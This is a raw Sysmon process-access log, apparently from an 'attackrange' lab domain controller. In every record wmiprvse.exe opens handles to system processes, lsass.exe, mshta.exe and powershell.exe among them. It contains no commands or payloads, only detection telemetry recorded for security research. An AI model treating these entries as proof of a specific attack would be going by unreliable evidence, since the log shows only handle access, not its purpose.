15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024252Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024251Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024250Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024249Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024248Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024247Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024246Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024245Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024244Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024243Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024242Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024241Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024240Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024239Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535A-6008-4906-00000000A301}5944C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024238Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024237Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024236Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4606-00000000A301}3316C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024235Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024234Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024233Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 